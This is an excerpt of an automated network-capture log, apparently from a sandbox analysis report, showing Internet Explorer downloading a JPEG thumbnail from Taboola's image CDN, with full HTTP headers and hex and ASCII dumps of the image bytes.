                                                                                                                                                                                                                                                                                  Data Ascii: WY*`lu}#8VE!C.[r1GHOj$~immPuxbX)/ZMZK6Z9r(({{\4rp}E"'E :0!Aib^[u{sln1;n{5o:+Rw;:54=tzbUbp0lZt=rp4
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC99INData Raw: 9e 4f 35 ad 30 01 04 11 bf a1 fc fb 11 45 e3 20 00 7b ae 3d fd 41 3b d2 b5 c2 92 15 f6 7d 40 fa fa d4 6a 10 31 24 9c 01 a4 66 87 4b f8 7e ca 32 f3 19 72 be 21 0d b6 91 c9 76 c6 02 0c 93 53 f4 ce 81 0d c1 4e 93 d0 18 15 78 f4 05 29 79 7e 47 33 b0 6d a3 e2 3a bb b3 b2 06 21 67 6f 7a d2 db 47 72 f2 9e 20 f1 17 43 11 c9 dc 50 37 13 64 98 a3 7d 60 6f dc 8c 8a d1 28 dd bd 89 a2 d9 fa a4 c7 14 d8 18 d4 4e e4 fe ef 53 58 c0 f2 c7 d9 40 ee de f4 9a 6d 9c 24 96 ae b9 49 90 f2 c7 b8 3e 86 bf 57 ce db 12 c7 31 6a f4 27 b5 06 56 00 ab 03 90 41 fd 11 cd 7b 67 60 6e 21 81 b2 54 33 1d 11 78 81 7b 3b ec 07 7a 3d 50 f4 8b e8 2d 63 37 4e 0d a4 01 1d b2 5b 4f d6 76 d5 85 d8 55 82 5e da 41 6b 04 f0 5a 15 52 e2 39 1c bc 10 84 3b 48 06 0b 05 a6 eb 37 97 56 3f 31 d5 a6 05 21 8a
                                                                                                                                                                                                                                                                                  Data Ascii: O50E {=A;}@j1$fK~2r!vSNx)y~G3m:!gozGr CP7d}`o(NSX@m$I>W1j'VA{g`n!T3x{;z=P-c7N[OvU^AkZR9;H7V?1!
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC101INData Raw: ee 18 09 ee 25 73 24 f2 e4 e7 77 38 db 23 3b 60 54 64 83 97 52 3e a1 48 43 27 a6 08 3f f2 28 8d 4b 90 31 bb ae 79 1e e3 14 5e 37 25 a2 90 90 06 c6 9e fa 76 cf ec 22 27 28 c3 92 7f a7 ad 5b 74 ce 93 0a 07 49 26 38 11 b2 02 42 c2 06 ee 5b b2 81 96 e0 0a be f8 3f e0 87 71 fd 90 66 0e b3 d6 93 93 e3 15 de d2 d9 f8 d2 3f 68 eb 50 58 74 eb 54 d1 05 ac 08 12 34 5c e7 81 ea 77 3f a0 34 f1 29 68 7f aa d7 87 24 f1 fc b4 c8 40 21 c1 fa 5b 07 d4 ad 79 61 b7 71 af 18 c6 f4 f0 c0 87 57 97 66 97 fe 16 82 aa 8c 2a 8d 80 ac 00 32 49 a9 21 b2 51 a5 08 e4 ef bb 11 ce 48 e2 9a 56 dc 20 7f 7d 89 23 6f 5a 7e 97 66 b3 c8 89 1c 10 a4 45 f7 e4 97 52 4d 4f 33 49 21 69 bc 47 d4 c5 94 83 9a 38 92 48 d6 27 03 0a 4e 3d 4f f1 a5 70 ea 0e a1 c1 c8 ce e7 b3 55 e5 c7 42 85 c2 db 45 65 1e
                                                                                                                                                                                                                                                                                  Data Ascii: %s$w8#;`TdR>HC'?(K1y^7%v"'([tI&8B[?qf?hPXtT4\w?4)h$@![yaqWf*2I!QHV }#oZ~fERMO3I!iG8H'N=OpUBEe
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC102INData Raw: c9 47 3c 13 2e 99 23 71 95 61 5e 34 20 e4 5a 48 f8 95 3d 91 db 91 ec 69 ad ae 87 31 5c 29 8d 99 b3 ef 80 45 5b db b1 90 2e 54 45 c1 1c f9 b3 4d 76 e1 86 10 c8 58 1c 7b 00 17 7d aa 46 9d 49 0d a3 2f ab 1b 83 9e c2 92 57 1b ad aa 9d b3 fe f2 39 1e c2 95 23 45 0a 88 a3 0a a0 6c 00 03 fc ac 37 11 ff 00 a2 54 0e 3f 81 a8 94 9e f1 bb a7 f2 52 2a 32 c3 83 23 bc 9f c9 d8 8a 8a 08 c7 09 12 04 1f c0 7e 9f ff d9
                                                                                                                                                                                                                                                                                  Data Ascii: G<.#qa^4 ZH=i1\)E[.TEMvX{}FI/W9#El7T?R*2#~


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.4 | 49850 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:55 UTC | 102 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fceedb38b7c05f6380193a62666745514.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://www.msn.com/de-ch/?ocid=iehp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: img.img-taboola.com
Connection: Keep-Alive
2021-10-07 13:51:55 UTC | 103 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 46724
Server: nginx
Content-Type: image/jpeg
access-control-allow-headers: X-Requested-With
access-control-allow-origin: *
edge-cache-tag: 364297243906297399083948393559119964732,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
etag: "afa97cd47e1634980ecb88887f6f02d2"
last-modified: Sun, 22 Aug 2021 23:37:07 GMT
status: 200 OK
timing-allow-origin: *
x-ratelimit-limit: 101
x-ratelimit-remaining: 99
x-ratelimit-reset: 1
x-request-id: 340a32483dcaf0ce1e7c4ba9484814f6
x-envoy-upstream-service-time: 26
X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb804
Via: 1.1 varnish, 1.1 varnish
Cache-Control: public, max-age=31536000
Accept-Ranges: bytes
Date: Thu, 07 Oct 2021 13:51:55 GMT
Age: 3049603
X-Served-By: cache-wdc5554-WDC, cache-dca17748-DCA, cache-mxp6955-MXP
X-Cache: HIT, HIT, HIT
X-Cache-Hits: 1, 1, 1
X-Timer: S1633614715.405612,VS0,VE1
Vary: ImageFormat
X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fceedb38b7c05f6380193a62666745514.jpg
X-vcl-time-ms: 1
                                                                                                                                                                                                                                                                                  Data Ascii: 6IoM)U_ln)\(? cdI547_'&K)#>&S5q8RYo>V9_LXCJ[`KSoLCv !kAE+69x[0d;_e(xsiB"x.'kLy4XsPe|s;k?[ja9UYt=z
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC116INData Raw: 81 f5 1d 4f c7 fb cc 6e 4b 7c 39 6b 17 c4 cc 77 d3 1d 09 3b 50 10 0c 64 10 dd f9 9b 30 3a 42 9d a1 4a 1d 89 9f 3d 5d 84 a1 76 20 d4 01 50 97 b0 de 23 a1 61 a8 d4 60 56 85 9d e2 b5 e9 2a a6 8c 3a 18 80 a3 ef d6 53 35 0a a0 3f 28 2d 41 db 6b 9b 50 6f da a3 85 3b 89 ab 48 11 99 94 ea 55 da 2b 96 bf e1 ed 5f 9d c0 dc 01 7f 94 04 de c9 5e 79 8e 83 22 91 57 7c df 13 18 1a 8e 6f fd fa 07 ee a0 86 9e 9d 2a d5 af 66 c9 fb a1 9a 06 25 d5 66 dd 41 23 b2 ff 00 fb 31 84 50 1c ae ca bf a9 3b ef 17 0b 35 92 84 93 e2 63 f4 79 47 d6 4d 41 e9 09 34 5c 01 df 99 8f d3 e3 57 24 12 68 55 50 13 2f b2 10 0c 7d ec 92 6e 16 ea 40 d5 0e 6d 5b 84 0a 63 31 7d 3f 1a 31 bd b5 36 c3 e7 7c f4 33 59 61 77 bc b6 d4 28 56 d0 2d de ab db b4 66 57 d3 f3 a1 01 d2 4d 8b b3 bc f7 54 ae fb 4a 05
                                                                                                                                                                                                                                                                                  Data Ascii: OnK|9kw;Pd0:BJ=]v P#a`V*:S5?(-AkPo;HU+_^y"W|o*f%fA#1P;5cyGMA4\W$hUP/}n@m[c1}?16|3Yaw(V-fWMTJ
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC117INData Raw: ad 1d a0 26 c9 5d a1 67 3b 86 aa 8b bd 6a 01 ae 65 24 90 22 0f 90 ad e1 77 18 76 f1 71 58 3a 64 c8 50 ae b2 40 bf 1d 44 d9 f0 95 ea 87 f5 07 98 c3 7b 53 47 8f 3b c3 b0 02 f8 ef 15 af 88 aa 5c d0 e3 a9 8a 8a 83 6f cc c6 60 cf ac 0d 86 c3 cf 98 04 05 ae 2a ae 90 c7 68 ce 95 4a b1 0a d9 15 08 51 44 d7 da 16 26 6c d5 70 ec 46 fb 41 54 2a ef a4 0c ca 77 02 64 6d 54 02 84 1f 7b 8c 43 10 2c 5c 70 53 79 79 1a 87 f6 11 b5 d8 b1 c4 2f a0 ad 80 b1 ce 9f 4e 81 10 59 50 58 76 8a b9 93 da f7 2b e2 ac aa 3f fb 59 8d 90 a9 1a 79 17 c7 6e 22 3e 33 95 39 1c 13 e2 a6 4b ca 71 ad 0e 36 26 2e 14 45 1b d9 ea 60 70 a3 4a 88 e7 57 3c 76 87 f0 a5 5f 91 16 39 20 45 0a cc 61 18 c1 a9 90 a9 15 d6 e0 ab 1b 0f bc d3 b0 d3 b0 85 01 5a 3d 37 84 6a 1b 80 a3 68 15 2a aa 64 60 36 06 c9 81
                                                                                                                                                                                                                                                                                  Data Ascii: &]g;je$"wvqX:dP@D{SG;\o`*hJQD&lpFAT*wdmT{C,\pSyy/NYPXv+?Yyn">39Kq6&.E`pJW<v_9 EaZ=7jh*d`6
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC118INData Raw: 62 85 24 fc b9 de 5e d7 18 8e 90 be 81 7c df 02 62 52 2c b1 f9 1e 4c ad 5e 04 35 b7 e0 67 34 23 6e 60 10 32 b0 d8 b5 81 7f 9c 3b 95 f9 50 3c 8f 02 63 c6 02 82 08 d8 1f 97 7b 31 d1 35 56 fc 5d 9e 23 32 ea 7a 4a 4b db cc f7 1c e3 41 8d ca f5 fd 6e e6 3c 81 41 d6 84 92 77 f0 20 6c 41 df 23 a9 d5 e3 bf 98 e8 5e 99 8f ca e8 08 e8 58 9b 73 57 b4 ac 67 4e 80 68 1a 1e 63 31 16 ab 44 f4 b3 35 3e c0 81 71 d8 8a 5a 3b 78 e6 7b 94 8a 14 01 51 d8 b1 82 ba c4 ac 99 0e 43 c0 d9 44 06 12 4f d8 42 6a 7c 8e f2 ef 63 04 b1 7f 82 15 d2 db 51 ef 03 06 63 a4 03 73 59 a5 4b f3 da 2e f6 37 3b 69 de 2e 91 54 2e 85 50 eb f7 b8 d9 09 02 af 4a f1 15 f7 b3 bd 8a ba b3 09 52 c4 a9 3e 44 01 86 92 4f 7d 8c f8 1d 34 48 20 18 0d 1b 62 0b 5e fc dc 05 d9 d4 32 83 e4 43 88 25 d8 dc 08 c5 74
                                                                                                                                                                                                                                                                                  Data Ascii: b$^|bR,L^5g4#n`2;P<c{15V]#2zJKAn<Aw lA#^XsWgNhc1D5>qZ;x{QCDOBj|cQcsYK.7;i.T.PJR>DO}4H b^2C%t
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC120INData Raw: 00 8e 71 ac 00 09 cd 5c e6 1d 3b 15 16 ec c1 50 7e 5b 20 81 34 d1 22 20 a2 7e f3 7c 92 72 68 7d 5f 4d 5d fd 97 ef 41 f7 1f 81 88 b0 a2 86 a5 44 0b c1 be 2b 16 6d cb 62 36 bb e0 71 67 f3 88 87 ee 77 34 3f b7 c0 ff 00 f7 0c 8a 0f db 64 fc 77 83 4f 1b 29 32 1b 5b 22 8d e0 8a 39 37 ec 88 8e 80 27 c5 e0 d2 c0 17 84 0c d5 4c 4f 83 9f a3 4b e0 1e 4f 07 bc d9 2a 37 fe 94 6c d5 43 8c 95 18 0e 74 ca bf 25 5a cf f8 38 bb 2c 85 de 4d 73 84 d0 20 2b 59 e2 88 c6 83 6f ae e4 7a 76 46 d3 54 56 fb eb 34 ba c9 9d fd 01 a7 69 51 16 9a 40 cb 6a 6b 8b ac 2f 6e 7d 70 ee 50 90 ac 17 de b7 cf 43 bc f4 c8 56 98 4c ac 94 6d d5 49 bf 3e f4 ff 00 bc 32 2c fa 75 92 19 d5 08 00 97 5f 70 15 fe ee 31 25 5d 5a 3e 97 51 24 7e ab 2e e1 b2 e8 fc 32 d8 c8 2e 1f 43 4d 2c 83 76 c0 17 e5 b6 66
                                                                                                                                                                                                                                                                                  Data Ascii: q\;P~[ 4" ~|rh}_M]AD+mb6qgw4?dwO)2["97'LOKO*7lCt%Z8,Ms +YozvFTV4iQ@jk/n}pPCVLmI>2,u_p1%]Z>Q$~.2.CM,vf
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC121INData Raw: b8 ed 65 72 1f 78 dc ce 45 57 5d 03 79 fa cf 52 67 09 04 69 18 e1 9d 81 a2 32 0d 0b 3c ee a8 ec 41 63 b5 88 21 39 1e 2f 20 d2 47 04 2f 7c 90 37 59 3d f3 87 4f 14 b1 06 66 40 5b cd f6 3b ae 32 7d fa 85 30 ae a9 58 b4 81 04 43 90 01 bb 3c f3 40 66 a1 66 d1 49 29 12 97 54 55 d9 19 04 81 67 ed 05 72 38 a0 93 57 23 3e c1 60 7d fc 57 e6 8f 79 01 8c 8a 01 78 5e 55 78 04 fc e4 f3 fa 6a fb 19 76 9b 0f 62 c5 1c 8e 5d 1e 97 ea 4e 91 33 7a 6e 02 3d 53 27 bb a3 88 90 c0 ba cd 31 66 a8 d8 4d f6 f5 b4 f8 e7 ce 16 4f d2 e9 9b 73 1f 49 9b 9f 92 8a c3 9e 73 6c 67 ea 10 8b 72 42 83 f0 3a 27 0c a1 a9 94 b7 67 a3 47 8f 1f ce 6a 27 01 d4 5d 0b 3f e4 64 b0 2b a2 7b cd 03 bb 05 d9 12 4a 17 ba 2d e7 35 3a 9d 0e 9e 2f ea ea b6 ab 39 5e 3b bc 76 01 22 d8 81 91 80 a6 ba bb 17 d1 c9
                                                                                                                                                                                                                                                                                  Data Ascii: erxEW]yRgi2<Ac!9/ G/|7Y=Of@[;2}0XC<@ffI)TUgr8W#>`}Wyx^Uxjvb]N3zn=S'1fMOsIslgrB:'gGj']?d+{J-5:/9^;v"
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC123INData Raw: 9e 9b 35 5b 93 88 a4 28 01 8d 7c 66 a9 1d d0 c6 8c 01 7b 5b 6e b9 19 a3 d0 e9 b4 6e fb 26 69 26 da bb 89 eb e0 57 e0 66 92 29 91 25 69 65 04 b3 13 b4 74 3f 6c d5 2c 4c 12 55 21 5a 31 67 c5 e4 ac 6d d5 18 16 2a 6a b9 c8 60 90 c3 ea ac db 86 c0 42 df 6d 8a 27 0c a6 80 4f 39 2c 30 cb 19 0f b4 29 e0 b1 35 59 2b 69 3d 40 55 c3 b2 b1 b6 ef 80 3a 19 12 4b 34 72 38 6a 0c 28 6d 3c d9 e6 ce 04 dd 1a b3 49 18 2e 38 ba 3c f9 ef bc 8b 40 f1 4b 25 14 22 cd 1a f0 70 c0 bb d5 98 2b 95 1d 90 05 78 cf d2 82 f6 c4 00 2e c0 cf d2 c3 5c ee 3c df 27 23 82 15 5b 09 76 28 f9 b1 91 b0 50 40 4a 1d 0c db 29 ae 40 c7 47 7e 19 ef 8a c9 f5 2c ae c1 07 03 da 6f 9e 6f 13 5b 22 1b 91 3d ad 55 5f 8c d3 48 26 8c b0 2a 4f c0 f1 fe 87 07 e3 07 19 af ff 00 f9 27 20 9f b3 a1 9f 4f 31 ae 97 4e
                                                                                                                                                                                                                                                                                  Data Ascii: 5[(|f{[nn&i&Wf)%iet?l,LU!Z1gm*j`Bm'O9,0)5Y+i=@U:K4r8j(m<I.8<@K%"p+x.\<'#[v(P@J)@G~,oo["=U_H&*O' O1N
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC124INData Raw: 93 78 ac c5 a6 94 ee 24 2f 16 38 3f e3 23 47 60 81 80 2e c2 8b 1e eb 23 8a 0d aa 19 4d 91 e4 56 3a 5b c6 c0 9a 5f 03 37 1b 25 78 cd ee c6 ef 68 1e 2a ff 00 ce 03 67 90 09 aa bc d5 4a 02 84 15 67 9e ae 86 40 a4 38 20 92 1b bb 1f 19 bf 51 06 aa 78 ca 8d ac 4b 16 3c f6 4d 11 84 95 8d 25 31 28 0d 31 fb 87 3f 92 b7 95 bb 4f f6 9b 53 75 f1 79 32 2a 7a 6e a4 96 1c 5f 6d ee f8 cd 15 2b cd 15 b5 0a 3c 8e ce 38 ae 30 b2 a2 82 79 be 86 33 33 9b 3d f8 18 ab b5 42 ff 00 27 18 d7 18 ba d6 33 92 41 da 54 ad 7c 1e 06 43 fa 77 89 59 95 4f 1e 48 eb 1a 78 f8 58 e2 05 6b 92 45 01 90 6c 3e a8 0a ca 18 fd df 81 f9 39 20 8d 42 b9 2a 76 9e af b3 d0 c7 d4 34 e6 b6 b0 1f 03 1d 12 53 72 92 ab f6 a8 e8 0f f1 85 76 34 77 c2 8b a0 0f 1c 79 39 00 00 06 a6 06 ec 0e 3a fc e0 79 41 f7 aa
                                                                                                                                                                                                                                                                                  Data Ascii: x$/8?#G`.#MV:[_7%xh*gJg@8 QxK<M%1(1?OSuy2*zn_m+<80y33=B'3AT|CwYOHxXkEl>9 B*v4Srv4wy9:yA
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC125INData Raw: cc 05 8e 4e 73 d9 39 56 6a f8 c2 79 1f 18 17 83 81 4d 79 39 3e b3 4d a5 58 4c 8f ee 93 ed 51 d9 fc e4 2d a9 9b f5 25 07 a5 f2 41 dc 3d f8 b1 05 5d ab 2e e9 e1 88 94 4b 6f b7 34 aa f1 e8 91 cb 7a ac b4 4b 51 da 0f e2 f1 da 4d 44 6c a0 6d 62 db 91 ec 0d dc 58 aa f8 cd 2c 4f 14 06 22 c2 ca 16 63 e0 33 72 7f 8c 8d f4 ea 4c 92 3d 08 db 68 be 42 fe 4e 4f a8 8f dd 18 99 d7 6b 1e 53 83 7f 8c 8d 35 c9 39 92 09 64 db ce f6 90 83 b8 e6 87 56 d2 c6 7d 62 8a eb e7 70 e4 0f 26 b0 a2 b2 2b a9 04 1e 88 e4 1c 74 0c c5 56 c9 ab 5f 8b c4 e6 b7 85 17 d3 03 8a b2 ab 73 63 f2 56 ee bf 6c f4 c3 d9 aa b1 9b 64 ff 00 79 ea b0 a3 fc e0 43 f0 4e 6c ae f3 c6 5b 0e f8 1f 18 79 1c e0 03 c8 38 14 e4 da a8 62 03 82 c4 9f 19 a9 fa b4 ad 22 ac 41 d1 2c 86 20 df 18 de c1 ba 9c 36 da 4b 06
                                                                                                                                                                                                                                                                                  Data Ascii: Ns9VjyMy9>MXLQ-%A=].Ko4zKQMDlmbX,O"c3rL=hBNOkS59dV}bp&+tV_scVldyCNl[y8b"A, 6K
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC127INData Raw: 50 a2 30 fd 41 16 29 04 d2 5a 88 81 3c 02 79 61 42 b8 f9 cd 3e a1 9e d8 29 52 2b 80 bc d7 75 c7 e0 e4 93 18 9a 33 b8 85 a2 48 f8 be b0 ef 94 c6 b6 54 d5 82 47 ff 00 99 09 64 5b 02 fd f5 c7 44 dd 76 72 6d f0 85 e4 01 b4 1b 14 71 35 42 59 21 58 c1 0d bf 94 22 cd d7 35 d7 19 1b 4a 4d a2 38 4d fc ad 5b 1a 1f 8e 46 6a e2 94 6e 9d 65 f4 c0 2a 5c 55 6f 23 e2 cf 63 0c 92 cc e6 37 0e ec cf 77 f8 e4 2f ed 9a 1d 1d 4a c2 50 29 94 5d 0a fe 08 ea c6 2a 85 55 51 74 3e 79 39 43 23 1c b3 9e 97 1d 89 37 86 c0 e3 14 58 e7 8c bf ce 00 2f 07 7c e1 c5 60 62 03 e3 3c 66 bf 42 ba d8 e3 5b 5d c8 d6 a4 e1 fa 83 c1 a8 d4 e9 52 2f 4d 63 24 34 a4 64 fa 6d 39 95 dd 65 2f b8 ff 00 ee 50 f7 f8 e7 8c 87 4c 24 68 4f 2c 86 12 01 eb 77 1f 1f 83 90 ba 44 29 8a 91 b7 da 4b 57 7e 78 bf 8c d5
                                                                                                                                                                                                                                                                                  Data Ascii: P0A)Z<yaB>)R+u3HTGd[Dvrmq5BY!X"5JM8M[Fjne*\Uo#c7w/JP)]*UQt>y9C#7X/|`b<fB[]R/Mc$4dm9e/PL$hO,wD)KW~x
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC128INData Raw: 51 25 f2 6d 02 65 76 a7 61 c8 7c 85 67 72 4b 74 66 12 c7 e4 a1 d5 5f 52 61 72 f8 b1 88 c9 5c f4 99 9e f9 94 c0 c6 cd 5b 6f 54 a7 c1 22 0f 2a 37 19 1c 9e 43 58 bf 52 61 ac 6e 93 23 42 2d 40 48 f2 92 a3 29 01 d7 f2 ad dc 6a e7 a5 e5 cf fa 99 31 53 56 86 c4 b3 d0 85 27 af 34 cd 2c 54 66 66 81 1c 18 7b 15 50 35 8e b1 63 15 2d 7a b5 7d 5f e9 c4 7a b9 3a 7e e6 55 89 52 7c 6c e6 64 b7 5d e4 60 24 84 4a 79 79 54 d5 58 32 76 d3 9d 0b 74 39 cf 8f cd c6 9f 7c d8 f9 07 22 59 7f f7 61 6f 9c 47 4f ff 00 cc d3 05 c3 7a a6 d2 34 30 d7 aa 83 94 78 67 0e 00 ac c8 77 64 fc 58 3f ea d5 af 54 4b 8a c6 de 83 d4 42 84 47 d9 64 28 c2 86 54 45 b6 fb 43 24 d0 49 dd 3a 45 dc 02 c0 0d 7a 76 de 1e dd 74 b3 8a c6 e1 be 02 ac ac 43 c3 72 3b f2 15 9c ce 83 ed 74 58 b5 16 5f 00 5c 47 53
                                                                                                                                                                                                                                                                                  Data Ascii: Q%meva|grKtf_Rar\[oT"*7CXRan#B-@H)j1SV'4,Tff{P5c-z}_z:~UR|ld]`$JyyTX2vt9|"YaoGOz40xgwdX?TKBGd(TEC$I:EzvtCr;tX_\GS
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC129INData Raw: f3 11 b8 ff 00 f3 0a ac 68 c1 18 80 a6 c4 51 c4 4e bf 98 ac ef d0 a8 32 11 2e 3f 2f 89 62 3f af 15 84 64 82 53 f8 69 e3 78 d5 77 d8 82 35 99 95 e8 2c c9 53 3f ed fd b5 dc 7a a7 78 4d ab 3c e4 8a d2 44 8e 1b 78 a5 e2 0f 88 ce 8e 73 d3 f7 a8 15 bf 7c 13 93 a8 6b 43 f6 0b 71 02 6c a1 89 07 13 3a 75 c9 43 e0 0d 50 b7 8f ad 62 07 96 c6 2a b0 cf 51 82 39 79 46 ab c6 37 86 c4 28 e4 fc 64 48 0f 7f f3 1d 50 f5 b5 6a 81 0d 3c 1d cb f2 7f 29 8e 83 c3 9c 6d b6 7a f3 d6 71 c4 85 8e 45 09 e0 73 1a 93 2f 8c 86 e4 dc bd 23 ea 09 01 9a ac dd 6e 93 c3 15 b4 89 5e a3 ee e0 f4 d9 0a b6 9b d3 78 8b 2c cf 84 c6 e7 26 8a 1a f3 41 60 ac b2 d4 8a c4 09 22 3f b4 97 fa 0f 1b 82 88 cb e1 86 b1 b7 24 c9 da 16 b1 de b8 ca ab 3a 8f 61 51 10 52 12 c6 81 d2 d4 11 a7 d2 65 1f 5b e4 47 cb
                                                                                                                                                                                                                                                                                  Data Ascii: hQN2.?/b?dSixw5,S?zxM<Dxs|kCql:uCPb*Q9yF7(dHPj<)mzqEs/#n^x,&A`"?$:aQRe[G
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC131INData Raw: dc 37 06 5d 89 45 5e fb 91 a6 36 ae 5c 33 d7 ab 58 3b 49 50 c2 ac a0 94 52 c8 8d c4 12 e0 fe 37 d6 6e cd 8c 7a 7c 29 55 89 44 6f 69 79 31 f7 60 26 dc 41 1b 21 5d c7 e1 86 bd 43 2d ab cc cb 2c a2 36 98 72 68 d7 66 ea 43 e3 80 00 03 1a ec 3e 43 4a 2a d1 9f aa 56 48 82 b4 aa bb 00 81 e7 55 10 b0 5f b3 90 d6 6e 0c 81 dc d5 63 1d 3c 5e ee a3 8b 95 b8 5c 19 52 42 fb 30 d6 1a 29 a8 59 58 20 81 21 e7 17 56 d2 85 41 07 b4 63 1c 2e 57 67 63 02 aa 9f 0e fa ba 31 98 39 a6 83 8b 4b 2c e9 8a 9b e3 d4 35 67 ae df e1 d9 7a a8 39 c2 ea 9d c2 7c f5 80 cf e0 f2 96 39 b1 c8 d3 86 ca 4b 3f 10 9c e7 92 82 49 1c ad f7 16 71 0f 54 76 dc 6a 7b d8 0c bb 44 22 f4 77 a8 f8 de 86 ec 0e 8b 1a 45 8a c9 a0 95 3b 17 0e b0 ca 49 1f e8 1a ab ea 08 21 74 39 ef 4e 67 d9 ea e6 31 6e c8 1d 23
                                                                                                                                                                                                                                                                                  Data Ascii: 7]E^6\3X;IPR7nz|)UDoiy1`&A!]C-,6rhfC>CJ*VHU_nc<^\RB0)YX !VAc.Wgc19K,5gz9|9K?IqTvj{D"wE;I!t9Ng1n#
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC132INData Raw: f1 7d 5d a9 38 c9 4f 5e 5b c5 19 6b 55 dc 3b 44 bb 42 ac a8 ae 06 e8 09 24 90 75 28 48 2c 28 a7 3c 75 6c 49 0c 71 a2 b9 dc 3b 74 83 ac 67 e3 c0 6a 09 ac 9b 4a 27 be 6e 58 dd 91 a6 0e 93 05 3b 2a 21 3e 49 e4 e7 4b 36 39 b1 71 84 c7 56 3c 2e aa c1 3c 6e ea 26 65 64 6f 98 3e 07 61 ac 85 58 68 c2 9c b1 76 e3 73 1c 96 1a 00 55 d2 d4 00 20 3b 95 2e 09 2c 43 6a ed 8b af 3c f4 ad c3 42 42 b5 e5 94 93 cd 95 a4 58 64 57 8a 3d de 54 e1 b9 e3 af 4f c8 1e 63 34 b1 da bd 3c 6d 12 90 5d 76 49 10 32 f2 0b a9 f2 55 6b c0 63 c4 62 71 32 49 0d 48 16 bb 06 69 16 20 6a b4 87 9b f7 4e 63 f2 4e b0 52 e6 e3 a8 9c 6b 56 ab 3d 6b 1d 19 90 fc a6 5b 32 77 70 1c 16 76 47 21 89 1a bf 8a f4 a2 bd f9 32 d4 32 93 09 2a da a8 d2 f3 60 ca 8c 8d 13 2b 36 d0 a2 f1 df c8 03 55 b3 3e 9d af 49
                                                                                                                                                                                                                                                                                  Data Ascii: }]8O^[kU;DB$u(H,(<ulIq;tgjJ'nX;*!>IK69qV<.<n&edo>aXhvsU ;.,Cj<BBXdW=TOc4<m]vI2Ukcbq2IHi jNcNRkV=k[2wpvG!22*`+6U>I
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC133INData Raw: ba b0 9f 89 09 b1 29 c5 82 ee 06 e3 4f 8a 5b f3 ca f0 de 4b 95 4d e7 ad 3a ba 34 11 44 0b cb 0a 73 27 61 e4 0d 8e ab 4b 7e 10 21 9d a6 96 f7 5f 1e ac a8 52 29 24 9c af 60 c0 8f 81 db 8e af e3 28 4a 81 68 4b 5e 66 44 6b d3 94 80 24 ed 62 34 63 1e d0 10 ac c5 78 2e a3 af 5e 95 21 62 96 53 ad 5e 43 6c 2b 07 82 14 e4 42 c9 27 1f 89 25 80 00 6f aa b8 b9 27 ca 49 63 25 6a 7a 51 64 66 bb 45 e1 43 05 33 3c 84 a4 49 0f c9 e5 ec 40 62 a7 5f e1 ed 2f 46 c7 a6 c8 25 a1 7a 4e 10 d8 8a 48 42 af 09 40 df c0 d7 f1 b7 72 9e 95 92 6a 31 d7 7b c4 c1 62 70 92 b7 d4 b4 01 e0 c1 41 0e 9d 97 c0 27 53 d9 bd 5d ee 34 d0 46 51 5e 19 a7 76 95 95 fa 52 c6 b2 31 fc c8 03 79 df 6d 5e b7 95 2f 6e 4b 52 41 61 5e 11 15 6b 2f 32 08 c8 04 70 54 dc 7c 87 65 3a a7 2f aa 2d e2 ef 18 c3 49 5b
                                                                                                                                                                                                                                                                                  Data Ascii: )O[KM:4Ds'aK~!_R)$`(JhK^fDk$b4cx.^!bS^Cl+B'%o'Ic%jzQdfEC3<I@b_/F%zNHB@rj1{bpA'S]4FQ^vR1ym^/nKRAa^k/2pT|e:/-I[
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC135INData Raw: 2b 00 b1 a1 91 e7 f2 a0 85 e2 75 54 60 0e 4a bc 56 1d 64 b2 88 fd d6 3e 71 ce e6 09 67 73 c8 01 10 66 e4 75 07 a5 7d 2d 8e b2 d4 79 d6 b4 6c ae 4d a7 53 08 55 de 24 60 11 a3 e0 ca a3 b3 10 35 02 3d 38 66 82 0a f5 0c 70 dc af 2c b3 02 c0 a2 27 09 38 30 e5 18 70 19 77 d8 ea 50 3d 3f 66 a5 a7 b8 61 89 e5 94 45 37 b5 70 a1 1c 21 47 5b 1b bb 0d 82 78 d6 18 e2 e4 49 6c a6 47 20 22 8e c2 ab 11 08 01 2a 74 dd 64 91 38 90 a8 c0 ea fd 38 cd 7a 31 d1 b4 8d bc 13 c4 14 ac fc f6 2d 21 31 88 d9 f7 71 b9 23 b3 69 72 98 2a c2 19 e6 ac 56 c5 38 a5 e2 16 41 1c 91 9e 2f ba 37 c0 37 8e 5a af 2d d1 4a c4 51 ac f2 ad 98 a0 50 36 71 09 dc 82 ca ac 18 